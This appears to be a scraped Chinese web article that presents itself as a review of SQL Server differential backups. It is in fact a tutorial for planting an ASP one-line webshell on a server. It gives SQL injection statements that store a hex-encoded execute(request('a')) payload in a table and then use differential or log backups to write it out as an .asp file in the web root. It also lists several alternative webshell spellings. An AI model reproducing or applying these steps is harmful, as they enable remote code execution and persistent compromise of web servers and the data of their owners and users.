主頁 > 知識(shí)庫 > 復(fù)習(xí)一下sql server的差異備份

復(fù)習(xí)一下sql server的差異備份
熱門標(biāo)簽:AI智能云呼電話機(jī)器人怎么注冊 溫州語音外呼系統(tǒng)排名 四川穩(wěn)定外呼系統(tǒng)公司 商家地圖標(biāo)注圖片 福州外呼系統(tǒng)招商 百度地圖標(biāo)注信息怎么修改 怎么在高德地圖標(biāo)注多個(gè)點(diǎn) 沈陽外呼系統(tǒng)有效果嗎 電話機(jī)器人接口是什么樣的
MSSQL差異備份,就是和前一次備份作對(duì)比,把不一樣的內(nèi)容備份下來,這樣,只要前一次備份后,插入新的內(nèi)容,差異備份就可以把剛插入的內(nèi)容備份出來,而這個(gè)備份文件將大大減少,得到webShell的成功也提高了不少! 

差異備份的流程大概這樣:
1.完整備份一次(保存位置當(dāng)然可以改)
backup database 庫名 to disk = 'c:\ddd.bak';--

2.創(chuàng)建表并插曲入數(shù)據(jù)
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.進(jìn)行差異備份
backup database 庫名 to disk='目標(biāo)位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

上面
0x3C25657865637574652872657175657374282261222929253E
就是一句話木馬的內(nèi)容:%execute(request("a"))%>

如下是網(wǎng)上常見的差異備份代碼,思路一樣!
===================================================
利用差異備份提高提高backupwebshell的成功率,減少文件大小
步驟:
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s

create table [dbo].[xiaolu] ([cmd] [image]);

insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT

0x77006F006B0061006F002E00620061006B00為wokao.bak
0x3C25657865637574652872657175657374282261222929253E是%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

聲明:方法不是我想的,我只是寫工具,默認(rèn)得到shell是
%execute(request("a"))%>
===============================================================

我發(fā)現(xiàn)上面代碼,有時(shí)會(huì)無效,而直接用

backup database 庫名 to disk = 'c:\ddd.bak'

create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 庫名 to disk='目標(biāo)位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

卻可以成功,所以把最原始的方法寫出來!思路是前人所創(chuàng),這不說大家也知道的!

庫名 必須要有效的庫名,一般注入工具都可以得到!如果某站過濾 "‘",就要把字符內(nèi)容轉(zhuǎn)為數(shù)值了!


網(wǎng)上還有l(wèi)og增量備份的,我也把他記錄一下
=====================================================
另一種log增量備份技術(shù):

';alter database null set RECOVERY FULL--

';create table cmd (a image)--

';backup log null to disk = 'f:\cmd' with init--

';insert into cmd (a) values (0x3C2565786563757465287265717565737428226122292
9253EDA)--

';backup log null to disk = '備份路徑'--

PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句話小馬16進(jìn)制轉(zhuǎn)來的

說到一句話馬,還可以有這么幾種寫法:

a).%%25Execute(request("a"))%%25>
b).%Execute(request("a"))%>
c).%>%execute request("a")%>%
d).script language=VBScript runat=server>execute request("a")/script>
e).%25Execute(request("a"))%25> 
您可能感興趣的文章:
  • C#實(shí)現(xiàn)MySQL命令行備份和恢復(fù)
  • C#實(shí)現(xiàn)的SQL備份與還原功能示例
  • c#使用file.copy實(shí)現(xiàn)文件備份示例
  • Python 實(shí)現(xiàn)文件的全備份和差異備份詳解
  • Python實(shí)現(xiàn)網(wǎng)站文件的全備份和差異備份
  • sqlserver 手工實(shí)現(xiàn)差異備份的步驟
  • 提權(quán)思路之MSSQL差異備份取系統(tǒng)權(quán)限
  • MSSQL差異備份取系統(tǒng)權(quán)限的相關(guān)軟件下載
  • C#寫差異文件備份工具的示例

標(biāo)簽:汕尾 來賓 無錫 七臺(tái)河 營口 邯鄲 西寧 寶雞

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《復(fù)習(xí)一下sql server的差異備份》,本文關(guān)鍵詞  復(fù)習(xí),一下,sql,server,的,差異,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《復(fù)習(xí)一下sql server的差異備份》相關(guān)的同類信息!
  • 本頁收集關(guān)于復(fù)習(xí)一下sql server的差異備份的相關(guān)信息資訊供網(wǎng)民參考!
    • 推薦文章